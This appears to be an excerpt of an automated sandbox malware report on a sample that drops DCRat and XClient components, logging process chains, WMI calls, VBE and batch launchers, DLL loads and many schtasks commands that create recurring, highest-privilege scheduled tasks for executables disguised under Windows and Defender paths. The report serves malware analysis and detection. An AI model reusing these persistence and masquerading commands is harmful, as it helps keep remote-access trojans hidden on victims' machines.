Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ywXeiXEvP2.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe

File read: C:\Users\user\Desktop\ywXeiXEvP2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ywXeiXEvP2.exe "C:\Users\user\Desktop\ywXeiXEvP2.exe"
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe"
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe"
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 8 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\user\SendTo\sihost.exe'" /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files (x86)\jDownloader\config\conhost.exe "C:\Program Files (x86)\jdownloader\config\conhost.exe"
Source: unknown	Process created: C:\Program Files (x86)\jDownloader\config\conhost.exe "C:\Program Files (x86)\jdownloader\config\conhost.exe"
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe "C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 8 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wintypes.dll	Jump to behavior
